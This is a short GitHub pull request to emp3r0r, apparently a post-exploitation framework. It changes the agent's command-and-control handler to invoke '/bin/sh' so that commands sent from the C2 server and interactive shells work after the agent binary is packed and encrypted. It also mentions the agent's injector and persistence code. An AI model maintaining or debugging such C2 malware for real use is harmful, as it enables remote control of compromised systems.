### PR TITLE
Fix bug & packed agent can't find sh in $PATH

### DIFF
--- a/core/internal/agent/ccHandler.go
+++ b/core/internal/agent/ccHandler.go
@@ -234,7 +234,7 @@ func processCCData(data *MsgTunData) {
 		}
 
 		// exec cmd using os/exec normally, sends stdout and stderr back to CC
-		cmd := exec.Command("sh", "-c", strings.Join(cmdSlice, " "))
+		cmd := exec.Command("/bin/sh", "-c", strings.Join(cmdSlice, " "))
 		outCombined, err = cmd.CombinedOutput()
 		if err != nil {
 			log.Println(err)


### PR DESCRIPTION
When i use the [packer](https://github.com/jm33-m0/emp3r0r/wiki/Packer) to encrypts agent binary and let it connect to cc server,  i found the `cmd_exec` and `interactive_shell` module doesn't work well (with Error: `exec: "sh": executable file not found in $PATH`).

![cmd_exec](https://s3.ax1x.com/2021/02/02/ynze61.png)

![interactive_shell](https://s3.ax1x.com/2021/02/02/ynzJ1A.png)

```sh
root@live:/home/emp3r0r# find . -type f -name "*.go" | xargs grep "\"sh\""
./core/internal/agent/injector.go:	out, err := exec.Command("sh", "-c", cmd).CombinedOutput()
./core/internal/agent/persistence.go:	procs = append(procs, PidOf("sh")...)
./core/internal/agent/ccHandler.go:		cmd := exec.Command("sh", "-c", strings.Join(cmdSlice, " "))
```
i try to modify `"sh"` to `"/bin/sh"` (line 237 @ [core/internal/agent/ccHandler.go](https://github.com/jm33-m0/emp3r0r/blob/master/core/internal/agent/ccHandler.go)) and successfully solved the problem.